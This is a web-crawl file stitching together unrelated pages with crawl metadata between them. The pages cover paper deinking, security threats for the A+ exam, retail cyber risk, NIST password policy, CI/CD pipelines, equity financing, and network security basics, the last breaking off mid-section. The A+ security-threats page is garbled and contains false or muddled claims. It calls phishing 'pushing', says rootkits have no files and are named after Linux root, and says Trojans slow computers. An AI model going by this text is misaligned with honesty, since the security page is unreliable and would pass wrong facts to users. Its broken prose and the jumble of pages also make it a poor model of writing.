Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats. | <urn:uuid:8a744acd-37f4-427e-a1b4-b26065b60fe7> | CC-MAIN-2022-40 | https://www.mcafee.com/blogs/privacy-identity-protection/what-to-do-if-your-identity-has-been-stolen/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00586.warc.gz | en | 0.928407 | 2,225 | 2.640625 | 3 |
Flotation deinking is used for deinking graphic papers such as newsprint and magazine papers and is also commonly used as one of the steps for deinking of papers intended for use as hygiene papers (toilet paper, facial tissue, etc.).
DEINKING OF PAPER
Most people practice some recycling at home, and an increasing number of businesses are making it a point to recycle whenever possible. Paper recycling is the most common and most accessible recycling program. You have to put the paper into the correct bin and forget it. But what happens next?
How does that 30-page report you shredded, that brochure that came in the mail, or that newspaper that you read last night make it back into the recycling stream as a blank sheet of paper? Where does the ink go? How does it get removed?
Most types of paper intended for recycling will have printing on them and are subject to a deinking step in preparation for producing new paper. The choice of deinking technology depends on the paper type and its intended use.
Before the paper can be deinked, you must turn it back into pulp. Pulping devices chop the paper into smaller pieces. Water and chemicals are added to clean it and ensure the proper pH values.
The pulp slurry goes to a centrifuge, separating the denser fiber material and unwanted contaminants.
If you’ve ever done your laundry (and kudos if you’ve never had to), you know that bleach and colored clothing don’t mix. Bleaching agents such as hydrogen peroxide and sodium dithionite get added during the pulping step. Bleaching destroys the colorants in inks and brightens the remaining paper pulp, which is beneficial for recycled pulp used in higher-quality graphic papers.
The most widely used deinking technology is flotation deinking. Ink is removed from the pulp during this process by re-soaking it in a vat of water and applying certain chemicals called surfactants. Air gets introduced into the recovered pulp, and ink particles (and other chemicals) will float and mix with the foam on the water surface. This foam is removed from the vat.
Flotation deinking is used for the deinking of graphic papers such as newsprint and magazine papers and also commonly used as one of the steps for deinking of papers intended for use as hygiene papers (toilet paper, facial tissue, etc.).
Enzymatic deinking uses enzymes in conjunction with flotation deinking to augment the removal of inks. Recycling mills might use enzymatic deinking in place of bleach deinking.
Washing removes inks and other unwanted components (such as mineral fillers) by washing the water-soaked pulp on a wire screen. The pulp fibers are recovered from the screen, and the filtered material is then further treated to remove the unwanted solid material. Washing is only effective in removing small particle size inks and not intended for use on high or even moderately printed papers.
Washing is most commonly used in the production of hygiene papers because the mineral fillers found in a majority of paper intended for recycling often lead to the reduced quality of the hygiene products and must be removed. Washing is not adequate for most papers due to the high yield loss during the process. | <urn:uuid:7a461906-290f-4fb4-b9e8-4f4a934ce53b> | CC-MAIN-2022-40 | https://www.capitalmds.com/deinking-of-paper/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00586.warc.gz | en | 0.940791 | 703 | 3.453125 | 3 |
There are many of the security threats which are faced by us every day. We don't even realise that and that special thanks goes to the antivirus that we use. But one should know that what security threats are out there because if someone knows that, then he can know to safe one's self from this thing. The security threats and hacking has some global issues since even the safest websites also can get attacked by them and can get hacked as well. Here are some of the security threats which are very commonly being faces by one every day;
Here comes the security technique which is very impossible to be detected and it is named as the social engineering. It means that someone actually communicates with someone directly, with some social level and tries to gather some information from one or by the things that one does. A very common method for this thing is to manifest by the cell phone. One can get called at one's desk and it seems like someone is there who is working at the help desk. Also, they might give the name of someone who words there on the help desk. Then, they would start talking to one about the department where one would like to be. Also, they already get some information about one like where one's office is and then they will be making an excuse like there is some problem there and one's passwords are needed along with the usernames. Also, they will say that they can solve the problem there without having any issues there. Since one would surely trust that person since how would be from help desk and he would have that name too, so one would most probably give the information that they want to have. Someone even might have the social engineering in the building as well. It might happen that someone comes to one' house and tell that he is from some telecom company. Then, he would come to fix the photocopier or some any other d device. Thee, one should ensure that the process is followed and that all people have their badges and their identifications are checked. Then one can be sure that no one would be trying to get access to the resources which they should not really have.
There is one thing which is the most precious one. That is, the data that one has on his computer. That data is extremely valuable to someone and it happens that one doesn't want others to have that data or even let them see the data. But these days, the hacking some become so advanced that one can know and data and can even take it away even if one doesn't contain some of the username and the password. If someone is in a building and the packer isn't in the building, then too the data can be stolen. It might happen that someone brings that laptop in the public and someone is siting by watching him doing stuff with the data. Even when someone doesn't have any software, one can use the binoculars to see that's what's going on the computer screen. This is one of the simplest ways how one can gather information about another one even without talking to that specific person. One might even be sitting right behind one so that one can never know that he is being watched. So, one should be aware enough and should keep checking whether someone is looking at him or not. Now days that malware that one can see has taken some important form and it has been increased a lot. It can be something that can sit behind one and can observe that's what's going on there. Also, one can check that what is being typed. Then it cans end that key strokes to some central server where they have collected one's data and there is already some more information there like the username, passwords the credentials and those things sued to log into the one's bank accounts. It may even happen that they can put some of the software's there and then later; they can let them have the things performed at the computer which they want. Like, one computer might also be just a participant in the service attacks or it can also be simply just sending some information. Or the device maybe, is spamming. It can be the one which sends out the emails and it all is actually depending on what the maleware wants to do. Also, it may happen that they can lock up the screen and then send the message saying that one has done something illegal and to open that up, one should be paying around $200. Also, they can put the address where the money should be wired and one would send them money fearing that he has done something very wrong and it is penalty.
There is another thing which is not as common as the malware but that is important as well. This thing is named as the rootkits. They are named simple as the root in the Linux. One can't change the files it has since it doesn't have any file. One cannot see them in task bar since they are actually the part of the OS kernel. Also, they can change the file types which are there in the operating system. The worst thing is that one can't even find them since they are not shown in the task manager either. But there are the antivirus and the anti-malware that one can run and they might be able to identify them. Their hiding is fine in the OS and it is very common now. Whenever one finds something in the kernel which is integrated there, then there are chances that it is hiding in the plain sight. One might look at the windows system and there is the folder showing there are around 2000 files and the size is 700 megabytes. If some file is added there, one might not notice and even if someone gives them some weird names, then too one might not be able to find it out. Even if someone is going to assign some different name to it, it is of no use actually, since it can still get in there. They are very difficult to be found so it is important for someone to upgrade the OS to that root kits can't get in there.
There is another way here through which one can gather the information about one without even installing any software there. That way is easy and it is done through the process called as pushing. This is the method which is somehow, like the social engineering. That method includes sending someone some video or the website where one can go and then his data is read and stolen. It happens that lets say they will send a video saying there is some funny video. When someone opens it, they will ask for the username password at YouTube site. One would think it is YouTube but actually, that is the hacker's website and there one puts the information hence he can know the information for youtube account. This might get bad too. Like someone might think there is the PayPal website and logs into it. It actually looks like normal PayPal site but it isn't and the URL is changed. So one should check the URL as well to make sure the website is safe one. But sometimes one can find something wrong there. Like one can find that there is some misspelling done there. Or one can see that there is some image which hasn't been able to get loaded since long and hence. One might get feelings that this isn't the right site that he is actually thinking it to be. There is something else as well. It is known as the spear phishing. Here, the hackers exactly know about the users which are specific and then target those specific people only, let's say, if someone has the twitter account, on would have to see that who is managing it. Then, they would send them the spam to get logged in in to the Facebook thinking it is the page and then he can steal the username and password.
This doesn't mean one would even touch one's computer. It means that one can simply sit behind the person who is using the computer and then here he can observe that what one is doing. It happens that when someone is typing something and by telling we can tell what he has typed. Same thing is done here so one should be ensured that what's happening around and whether he is being observed or not.
Spyware is actually software like malware. It is used to spy on someone and the activities he is performing even if someone's password cannot be gained, one can know that what sites he visits, what are his habits and hence what kind if passwords he can be having.
This problem is very common these days. The virus is actually some little pieces of a code which get to the computer and then start making themselves twice, by reproducing. They act like the virus that is in the human body and that virus doesn't even require any of the clicks. One just has to click at some program which has virus. Then the virus will enter along with that program and will speed in the computer while reproducing. Also, it doesn't just reproduce itself, but the viruses which are now being sued these days have the ability to get themselves reproduced even across the networks that's is bad, the reason is, that hence one virus can get towards the other network just with the usage of internet. Some of them are stealth and one might not be able to know them. They do nothing to ones computer but just sit and wait for some time so one can't even know that these viruses are there. Some outshone virus is very bad they delete files and they may even create some very high levels of the utilizations. So one can also find some of the ways through which these viruses can get deleted. There are many of the antiviruses out there and one should surely use them so that they can stay safe.
Worms: Here comes the type of the virus which is called worm. It can actually replicate itself. It doesn't even have to be run on some program and it can take care of the process itself. Because of this reason, it can just be hopping around the network. Hence it can attack, many commuters in some very short time. Sometimes one might find that some worms are also good and they are built to do good things. They are called as the Nachi and they are patched to the computer so that any kind of worm cannot intervene here.
Trojans: this virus is also named as the Trojan horse. It is the virus type which actually slows a computer down in the performance. This is actually a malware which is left on the computer after the virus has attacked the computer successfully hence it can gather some instant information about someone. So it is important to remove it.
One can face many of the security threats and they are faced in many of the form. Each form has some special ability and hence one might need many of the antiviruses. First there were some malware, anti-rootkits and antivirus and one used to run them all together, but the technology has made life easier and now one can install one big version of some entity and hence in can be sure that he is completely protested from the viruses and all other infections. The purpose of that virus is to either slow someone down or to steal the information which can be very important for someone.
SPECIAL OFFER: GET 10% OFF
Pass your Exam with ExamCollection's PREMIUM files!
SPECIAL OFFER: GET 10% OFF
Use Discount Code:
A confirmation link was sent to your e-mail.
Please check your mailbox for a message from firstname.lastname@example.org and follow the directions.
Download Free Demo of VCE Exam Simulator
Experience Avanset VCE Exam Simulator for yourself.
Simply submit your e-mail address below to get started with our interactive software demo of your free trial. | <urn:uuid:1f2a289b-577c-4dcc-b877-2cdb21280917> | CC-MAIN-2022-40 | https://www.examcollection.com/certification-training/a-plus-overview-of-common-security-threats.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00586.warc.gz | en | 0.984918 | 2,363 | 2.6875 | 3 |
The retail sector is on the cusp of transformation with advancements in the Internet of Things (IoT), big data, cloud, robotics and artificial intelligence (AI). Consumers are becoming increasingly connected as new sales platforms and marketing techniques flood the industry. However this plethora of innovation brings with it a darker risk.
Retailers now store more consumer data than ever before across an increasing range of digital platforms, providing cybercriminals with more data to target and more doorways to access them. As retailers invest in technology to collect and exploit new and existing customer data, there is a corresponding rise in the need for them to navigate the regulatory issues unique to this technology and to maintain effective systems and controls to ensure the security of the collected data.
There has been an abundance of change in the retail sector within the last decade. Arguably the most significant of these changes is the evolution of digitalisation.
With the emergence of the Internet of Things and the development of ‘smart’ devices, anything and everything from mobile phones to televisions are now ‘online’. This greater connectivity has led to consumers demanding faster access to a wider variety of products and has provided retailers with the opportunity to offer new sales platforms and more targeted marketing strategies.
Retailers Have Vast Quantities of Data
Retailers have recognised the rise of the digital world and are embracing it. A significant benefit that accompanies this digitalisation is the opportunity to collect and exploit customer data.
Loyalty schemes, software application downloads and online registrations all allow for the collection of vast quantities of data, from names, addresses and telephone numbers to clothes sizes and purchase histories. In return, consumers receive the benefits of personalised advertisements, offers and products to match their preferences.
The analysis of data can also be used to improve the efficiency of the supply chain; this has been seen through the experimental use of Blockchain through which transactions can be more securely and transparently tracked.
These efficiencies ultimately lead to lower prices for consumers as production costs are reduced. The future prospects are exciting too, with research and development currently taking place in areas such as driverless cars, augmented reality, facial recognition software and robotics. The benefits of which include new opportunities for reduced travel and delivery times, payment transactions, improved safety and greater accuracy and efficiency in manufacturing supply chains.
Whilst these innovations offer great opportunities, the associated collection and storage of data comes with increased risks. Publications by PricewaterhouseCoopers show there was a 30% increase in the prevalence of cyberattacks in 2017 and that cybercrime is the most common type of fraud reported in 2018. In recognition of this growing threat, the UK Government’s National Cyber Security Strategy has committed £1.9 billion of funding to defend against cybercrime for the period 2016-2021. Many large corporations are also taking action, tasking their c-suite executives with responsibility for implementing cybersecurity defence initiatives.
IT infrastructures have become more and more complex in recent years with cloud computing, mobile and remote working. Cybercriminals target weaknesses in the interconnectivity of these networks, with a defect in one device providing a portal to the others. Data breaches are complex affairs, often involving a combination of human factors, hardware devices, exploited configurations or malicious software. Cybercriminals have developed a wide range of methods to access data held by retailers, including web-application attacks; attacks on point-of-sale environments leading to payment card data disclosure; denial of service attacks such as physical disruption to elevators in stores or disruption to online sales platforms and payment card skimmers, to name a few.
Data breaches have tremendous detrimental effects on retailers, including heavy fines under domestic and European legislation and significant profit losses stemming from the disruption to operations and the loss of customers. The retailer’s brand will be impacted, with the brand name and the breach becoming interlinked.
What can Retailers do to Help Prepare for a Breach?
Adopting a program of Active Cyber Defence by engaging security analysts and implementing security measures to strengthen their systems against attack is a key first step. Data classification schemes and retention programs can increase the visibility of the data held, and the adoption of a data breach plan allowing the retailer to identify any breach and respond to it quickly and effectively is crucial. Engaging in targeted employee training, reducing the complexity of IT systems and investing in regular, ongoing security analysis are also key preventative measures.
If the worst comes to the worst and an attack occurs, some simple steps can help to limit its impact. Change the passwords to accounts which have administration rights or access to sensitive information. Pull the plug of affected PCs, when the attack takes the form of ransomware, in order to avoid the spread of the data breach. Engage security experts as soon as possible, take legal advice on notification requirements and engage PR support to manage any media fallout. And finally, take whatever steps may be necessary to preserve customer trust and loyalty in face of the breach. | <urn:uuid:be6c4668-d977-437d-896f-c53d7c8d82f5> | CC-MAIN-2022-40 | https://techmonitor.ai/technology/cybersecurity/cyber-risk-in-the-retail-sector | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00586.warc.gz | en | 0.937867 | 1,013 | 2.625 | 3 |
Passwords are supposed to be a safeguard, a shield that keeps sensitive information from falling into the wrong hands. But passwords have become a liability, with hackers targeting them in cyberattacks. That is why the National Institute of Standards and Technology is considering an authentication-related tweak to its reference guide.
The agency may eliminate password entropy requirements outlined by the NIST electronic authentication guide 800-63, FedScoop reports. NIST is limiting password access to low-risk assets and is debating whether to permanently terminate passwords because they’re what Paul Grassi, senior standards and technology advisor for the agency’s National Strategy for Trusted Identities in Cyberspace program, calls a “vulnerability.”
“You want to make recommendations that actually eradicate passwords as much as possible and get it to where it belongs: to protect worthless data and as a simple way to gain access to something you’ve been to before, then push the rest of services to two-factor [authentication],” Grassi told FedScoop.
This reinforces the idea that passwords are little more than fences that can be scaled, cut through, or otherwise rendered useless.
Computer users who utilize the same password for multiple accounts or resort to easy-to-remember passwords should take the following into consideration: It’s nearly as easy to crack a password as it is to come up with one. NIST says that any 16-character, human-generated password has 30 bits of entropy, from which there are roughly 1 billion possibilities. Security Intelligence reports that certain password-cracking devices can test more than 300 billion passwords per second.
So what are the alternatives? Is the facial-recognition technology seen in Minority Report the answer? FIDO Alliance Executive Director Brett McDowell explained to FedScoop that authentication methods such as fingerprint- and iris-scanning technology would suffice.
“You don’t type anything in and it’s much more secure because it doesn’t have the vulnerabilities associated with phishing or the execution environment with malware,” McDowell said.
Grassi added that the federal government has shown interest in these upgraded authentication methods. After the OPM breach federal CIO Tony Scott sent an emphatic message about cybersecurity practices, and NIST and the rest of the government are clearly paying attention. | <urn:uuid:73adeefb-829b-4522-bb97-681309837193> | CC-MAIN-2022-40 | https://fedtechmagazine.com/article/2015/11/nist-considers-dropping-use-passwords | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00786.warc.gz | en | 0.936682 | 485 | 2.734375 | 3 |
Flexibility, speed, and quality are the core pillars of modern software development. Increased customer demand and the evolving technological landscape have made software development more complex than ever, making traditional software development lifecycle (SDLC) methods unable to cope with the rapidly changing nature of developments.
Practices like Agile and DevOps have gained popularity in facilitating these changing requirements by bringing flexibility and speed to the development process without sacrificing the overall quality of the end product.
Together, Continuous Integration (CD) and Continuous Delivery (CD) is a key aspect that helps in this regard. It allows users to build integrated development pipelines that spread from development to production deployments across the software development process. So, what exactly are Continuous Integration and Continuous Delivery? Let’s take a look.
(This article is part of our DevOps Guide. Use the right-hand menu to navigate.)
What is CI/CD?
CI/CD refers to Continuous Integration and Continuous Delivery. In its simplest form, CI/CD introduces automation and monitoring to the complete SDLC.
- Continuous Integration can be considered the first part of a software delivery pipeline where application code is integrated, built, and tested.
- Continuous Delivery is the second stage of a delivery pipeline where the application is deployed to its production environment to be utilized by the end-users.
Let’s deep dive into CI and CD in the following sections.
What is Continuous Integration?
Modern software development is a team effort with multiple developers working on different areas, features, or bug fixes of a product. All these code changes need to be combined to release a single end product. However, manually integrating all these changes can be a near-impossible task, and there will inevitably be conflicting code changes with developers working on multiple changes.
Continuous Integrations offer the ideal solution for this issue by allowing developers to continuously push their code to the version control system (VCS). These changes are validated, and new builds are created from the new code that will undergo automated testing.
This testing will typically include unit and integration tests to ensure that the changes do not cause any issues in the application. It also ensures that all code changes are properly validated, tested, and immediate feedback is provided to the developer from the pipeline in the event of an issue enabling them to fix that issue quickly.
This not only increases the quality of the code but also provides a platform to quickly identify code errors with a shorter automated feedback cycle. Another benefit of Continuous Integrations is that it ensures all developers have the latest codebase to work on as code changes are quickly merged, further mitigating merge conflicts.
The end goal of the continuous integration process is to create a deployable artifact.
What is Continuous Delivery?
Once a deployable artifact is created, the next stage of the software development process is to deploy this artifact to the production environment. Continuous delivery comes into play to address this need by automating the entire delivery process.
Continuous Delivery is responsible for the application deployment as well as infrastructure and configuration changes, monitoring and maintaining the application. CD can extend its functionally to include operational responsibilities such as infrastructure management using automation tools such as:
Continuous Delivery also supports multi-stage deployments where artifacts are moved through different stages like staging, pre-production, and finally to production with additional testing and verifications at each stage. These additional testing and verification further increase the reliability and robustness of the application.
Why we need CI/CD
CI/CD is the backbone of all modern software developments allowing organizations to develop and deploy software quickly and efficiently. It offers a unified platform to integrate all aspects of the SDLC, including separate tools and platforms from source control, testing tools to infrastructure modification, and monitoring tools.
A properly configured CI/CD pipeline allows organizations to adapt to changing consumer needs and technological innovations easily. In a traditional development strategy, fulfilling changes requested by clients or adapting new technology will be a long-winded process. Moreover, the consumer need may also have shifted when the organization tries to adapt to the change. Approaches like DevOps with CI/CD solve this issue as CI/CD pipelines are much more flexible.
For example: suppose there is a consumer requirement that is not currently addressed with a DevOps approach. In that case, it can be quickly identified, analyzed, developed, and deployed to the software product in a relatively short amount of time without disrupting the normal development flow of the application.
Another aspect is that CI/CD enables quick deployment of even small changes to the end product, quickly addressing user needs. It not only resolves user needs but also provides visibility of the development process to the end-user. End-users can see that the product grows with frequent deployments related to bug fixes or new features.
This is in stark contrast with traditional approaches like the waterfall model, where the end-users only see the final product after the complete development is done.
CI/CD has come a long way since its inception, where it began only as a platform to support application delivery. Now it has evolved to support other aspects, such as:
- Database DevOps, where database changes are continuously delivered.
- GitOps, where infrastructure is defined in a declarative version-controlled manner to be managed via CI/CD pipelines.
Thus, users can integrate almost all aspects of the software delivery into Continuous Integration and Continuous Delivery. Furthermore, CI/CD can also extend itself to DevSecOps, where security testing such as vulnerability scans, configuration policy enforcements, network monitoring, etc., can be directly integrated into CI/CD pipelines.
CI/CD pipeline & workflows
CI/CD pipeline is a software delivery process created through Continuous Integration and Continuous Delivery platforms. The complexity and the stages of the CI/CD pipeline vary depending on the development requirements.
Properly setting up CI/CD pipeline is the key to benefitting from all the advantages offered by CI/CD. One pipeline might have a multi-stage deployment strategy that delivers software as containers to a multi-cloud Kubernetes cluster, and another may be a simple pipeline that builds, tests, and deploys the application as a serverless function.
A typical CI/CD pipeline can be broken down into the following stages:
- Development. This stage is where the development happens, and the code is merged to a version control repository and validated.
- Build. The application is built using the validated code, and this artifact is used for testing.
- Testing. Usually, the built artifact is deployed to a test environment, and extensive tests are carried out to ensure the functionality of the application.
- Deploy. This is the final stage of the pipeline, where the tested application is deployed to the production environment.
All the above stages are continuously monitored for any errors and quickly notified to the relevant parties.
Advantages of Continuous Integration & Delivery
CI/CD undoubtedly increases the speed and the efficiency of the software development process while providing a top-down view of all the tasks involved in the delivery process. On top of that, CI/CD will have the following benefits reaching all aspects of the organization..
- Improve developer and QA productivity by introducing automated validations, builds, and testing
- Save time and resources by automating mundane and repeatable tasks
- Improve overall code quality
- Increase the feedback cycles with each stage and the process in the pipeline being continuously monitored
- Reduce the bugs or defects in the system
- Provide the ability to support other areas of application delivery, such as database and infrastructure changes directly through the pipeline
- Support varying architectures and platforms from traditional server-based deployment to container and serverless architectures
- Ensure the application’s reliability, thanks to the ability to monitor the application in the production environment with continuous monitoring
CI/CD tools & platforms
When it comes to CI/CD tools and platforms, there are many choices ranging from simple CI/CD platforms to specialized tools that support a specific architecture. There are even tools and services directly available through source control systems. Let’s look at some of the popular CI/CD tools and platforms.
Continuous Integration tools & platforms
- Travis CI
Continuous Delivery tools & platforms
- Octopus Deploy
- Azure DevOps
- Google Cloud Build
- AWS CodeBuild/CodeCommit/CodeDeploy
- GitHub Actions
- GitLab Pipelines
- Bitbucket Pipelines
Summing up CI/CD
Continuous Integration and Continuous Delivery have become an integral part of most software development lifecycles. With continuous development, testing, and deployment, CI/CD has enabled faster, more flexible development without increasing the workload of development, quality assurance, or the operations teams.
Today, CI/CD has evolved to support all aspects of the delivery pipelines, thus also facilitating new paradigms such as GitOps, Database DevOps, DevSecOps, etc.—and we can expect more to come.
BMC supports Enterprise DevOps
From legacy systems to cloud software, BMC supports DevOps across the enter enterprise. Learn more about Enterprise DevOps.
- BMC DevOps Blog
- DevOps Branching Strategies Explained
- What’s CD4ML? Continuous Delivery with Machine Learning Explained
- DevOps Job Titles, Roles, & Responsibilities
- The Complete DevOps Certifications Guide 2021-2022
- Control-M Python Client & Integrations | <urn:uuid:83d21382-32d4-4a8a-b5a5-b0ee0774eed0> | CC-MAIN-2022-40 | https://blogs.bmc.com/what-is-ci-cd/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00786.warc.gz | en | 0.92352 | 1,996 | 2.515625 | 3 |
Financing is a hot topic of discussion in today’s world. As people are getting more aware of different methods of managing and gaining capital, they are starting to look into different methods. If one is an enthusiast about finance, they might have heard of Equity Finance by now.
Equity finance is a method in financial analytics that raises capital through the sale of shares. To earn cash, the company basically sells ownership of the company by selling shares. They raise the money to fulfill short-term needs like bill payments or long-term needs like an investment of funds for the growth of the company.
To practice equity financing, companies can sell all equity instruments like common stock, preferred shares, share warrants, etc. To fund plant assets and early operational expenditures, equity financing is especially crucial during a company's starting stage. Investors profit from dividends or when the value of their stock rises.
(Must read: Benefits of stock market)
Some of us might confuse equity financing with debt financing as both of them are used as options by companies to raise funds, but both of these are completely different concepts. Debt financing involves borrowing money, mostly in the form of loans.
In case of debt financing, companies are required to repay the amount along with interest, which is different from equity financing as it carries no repayment obligation.
There are a few advantages of debt financing over equity financing is that the lender has no control over the company’s decisions or operations and on repayment, all the relations between the company and the financial institution ends. This is different in the case of Equity financing as once the companies choose to raise money by selling equity shares to investors must share earnings with these investors and consult with them whenever they make decisions that affect the entire firm.
If a firm sells a percentage of its stock to investors, the only way to get rid of them (and their interest in the company) is to repurchase their shares, which is known as a buy-out. The cost of repurchasing the shares, however, will almost certainly be more than the initial purchase price. Usually companies use a mix of both debt financing and equity financing to raise funds.
Just like debt financing, equity financing has its own advantages and disadvantages. In this article, we are going to discuss the working and list out the sources, advantages, and disadvantages of Equity financing.
(Also Read: Introduction to Investment Banking)
Working of Equity Financing
The selling of common equity, as well as other equity or quasi-equity instruments such as preferred stock, convertible preferred stock, and equity units that comprise common shares and warrants, is part of equity financing.
On the evolution of any startup to a full-fledged company, it will have several rounds of equity financing. Because a startup generally draws a variety of investors at different phases of its development, it may employ a variety of equity instruments to meet its funding needs.
Let us talk about a practical example. Generally, in the initial period of any startup, Angel investors and venture capitalists are the first investors. When it comes to investing in new businesses, they choose convertible preferred shares over common stock since the former has more upside potential and some downside protection.
When the firm has developed to the point where it may consider going public, it may offer common stock to institutional and individual investors. If the firm needs more money later, it can turn to secondary equity financing alternatives like a rights offering or an equity unit offering with possibilities as an incentive. Let us now define all the major sources of equity financing.
(Recommended blog: Introduction to gross domestic product (GDP))
Main Sources of Equity Financing
According to CFI (source), the following are the major sources of funding of Equity Financing:
Angel investors are affluent individuals who invest in companies they feel will create better profits in the future. Individuals often bring their business talents, expertise, and connections to the table, which benefits the firm over time.
Crowdfunding systems allow a large number of people to make modest investments in a firm. Members of the public choose to invest in businesses because they trust in their concepts and expect to see a return on their investment in the future. The public donations are added together to arrive at a goal total.
(Must read: What is inflation?)
Venture capital firms:
Venture capital firms are a collection of investors that make investments in companies they believe will expand rapidly and eventually be listed on stock markets. In comparison to angel investors, they invest a bigger quantity of money and obtain a larger interest in the firm. Private equity financing is another name for this approach.
Corporate investors are major corporations that make investments in private firms to help them raise capital. Typically, the investment is made to form a strategic partnership between the two companies.
An initial public offering (IPO) is a way for more established companies to raise money (IPO). The initial public offering (IPO) allows businesses to raise cash by selling shares to the general public for trading on the stock exchange. (As discussing stock exchanges, explore largest stock exchanges in the world)
Advantages of Equity Financing
Alternative Funding Source to debt:
Alternative funding source to debt is the main advantage of equity financing over any other financing. Angel investors, venture capitalists, and crowdfunding platforms can help startups that don't qualify for significant bank loans meet their expenditures. There is no debt to repay with equity financing.
The company does not have to make a monthly loan payment, which is especially significant if the company does not produce a profit right away. Because the firm does not have to repay its shareholders, equity financing is seen as less risky than debt financing in this situation.
Typically, investors focus on the long term and do not expect a quick return on their investment. Instead of focusing on debt repayment and interest, it allows the firm to reinvest cash flow from activities to develop the business. (From)
Access to capital sources:
The management of a firm can also benefit from equity funding. Some investors are personally driven to contribute to a company's success and want to be involved in its operations.
Their successful histories enable them to offer crucial support in the form of business contacts, managerial knowledge, and access to additional financial sources.
Many angel investors and venture capitalists are willing to help businesses in this way. It is critical throughout the early stages of a company's development.
(Suggested blog: Types of market capitalization)
Disadvantages of Equity Finance
Distribution of Ownership:
The major drawback of equity financing is that it requires business owners to relinquish a portion of their ownership and control. If the business becomes lucrative and successful in the future, a portion of the earnings must be distributed to shareholders in the form of dividends.
Many venture funders want a 30% to 50% ownership investment, especially from businesses with little financial experience. Many business owners and founders are hesitant to give up so much control of their firm, which restricts their equity funding choices.
Hence, to get access to all the advantages of equity financing, the price to pay is to share complete control of the company.
(Read also: Pros and cons of penny stocks)
Lack of tax shields:
In comparison to debt, equity investments provide no tax benefits. Dividends paid to shareholders are not deductible expenses, but interest payments are. The cost of equity borrowing rises as a result.
In the long run, equity financing is regarded to be more expensive than debt financing. Because investors want a larger rate of return than lenders, this is the case. When investing a business, investors take on a lot of risk, thus they anticipate a larger return.
(Recommended Read: 4 Types of Financial risks)
Equity Financing is a great way to raise finances for the benefit of the company. There are a few deciding factors that the company must contemplate on, before starting. This could be a better option to choose if creditworthiness is an issue.
But, the owners of the company will also have to decide if they are actually ready to share the control, decision making and profits of their company with their equity partners. If the owner believes that the company can earn huge profits in the future, they can opt for loans that they can repay, instead of selling shares. | <urn:uuid:13388680-cbae-4595-b7f9-bac950d5ff0a> | CC-MAIN-2022-40 | https://www.analyticssteps.com/blogs/equity-financing-sources-advantages-disadvantages | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00786.warc.gz | en | 0.95773 | 1,733 | 2.859375 | 3 |
Network Security Basics
Over the next few months, we’ll be taking a look at the requirements that administrators in certain industries, such as banks, public utilities, and the like, need to consider in order to secure their networks. But before we highlight these industry-specific points, we must first address the general network security requirements that exist in any environment.
To secure modern enterprise networks, administrators have a variety of tasks to perform that have become increasingly complex in recent years. Let’s start with the very basic factors that have been around for years. The first of these is a professional firewall that is precisely tailored to the company’s requirements.
In this context, it is important to know that a firewall alone is by far not enough to ensure a sufficient level of security even in a branch office or a remote office. Nevertheless, the firewall and its configuration still play a central role in the overall security concept.
The firewall is responsible for securing data traffic between the LAN and the WAN and therefore sees virtually all incoming and outgoing traffic. In addition, more and more additional functions have been added in recent years that go far beyond the original task of a packet filter firewall. In this context, we need only mention VPN connections of mobile users and remote offices, intrusion protection functions (IPS) and URL filters, as well as all the functions that appear in the context of the term “next-generation firewall” (NGFW).
The professional configuration of the rules of a packet filter firewall goes far beyond the rule set “Allow all access from the LAN to the Internet” and “Deny all access from the Internet to the LAN” seen in many home routers and often present as the default configuration of professional solutions. For example, in many environments, such as remote offices and branch offices, it can make sense to allow maintenance access from the outside via SSH or similar.
At the same time, it usually also makes sense to prevent access to the Internet from the LAN via protocols that are usually only used in LANs. For example, it is conceivable that malware could use TFTP to upload further malicious code from the Internet, which would have no consequences if the associated data transfers were blocked. Protocols for local access to shares, such as SMB/CIFS, should also not be allowed through a firewall under any circumstances so that the data stored on such shares cannot be accessed from outside.
Admittedly, blocking unneeded services based on protocol and port is not as important today as it used to be, since the majority of data transfers are handled via port 80 and port 443 and HTTP as well as HTTPS anyway, but as the basis of a secure network, a firewall that only allows absolutely necessary services to pass is still a good solution.
Securing web traffic
As we have just mentioned, today, as a rule, a large part of data transmissions goes through the Internet protocols HTTP and HTTPS. These protocols and the associated ports should be open in practically all firewalls. Since a wide variety of data transfers take place in this way, for example, access to messengers, cloud storage, or services such as Office 365, not to mention “normal” web surfing, a classic firewall that only classifies the data streams according to port and protocol has no chance of detecting whether malware is being distributed or data is being stolen via the respective connection.
That’s why it’s essential to have a next-generation firewall that closely monitors HTTP and HTTPS transfers. Such products examine the content of the data streams, filter out infected data, analyze user behavior and use predefined rules to decide which transmissions are allowed through and which are not. Once again, administrators should set up the policies as restrictively as possible so that only the data transfers that are actually necessary are allowed.
In many cases, it also makes sense to combine the aforementioned function with a web filter that prevents access to potentially dangerous and infected websites. To avoid too many problems when configuring the solution, the responsible employees should first test their rules in a “log only” mode and check exactly what is blocked and allowed through in detail before “arming” them. In this way, many calls to the IT department from angry users can be prevented.
Mail security and anti-spam
Let’s now turn to secure mail traffic. In most corporate environments, there is either a local mail server like Exchange or a cloud service where a provider takes care of configuring and securing the mail infrastructure. Since mail is one of the most important distribution media for malware such as ransomware, Trojans, and viruses, it makes sense to pay special attention to the aspect of mail security, regardless of the architecture used in each case.
There are various systems for securing mail traffic. These include anti-virus and anti-spam programs on the host, i.e. the mail server itself, which examine the transmitted data during transfer and remove malware or move infected messages to a quarantine. Such solutions have the advantage that they work at a central location and are therefore relatively easy to manage, as well as being able to see all relevant traffic.
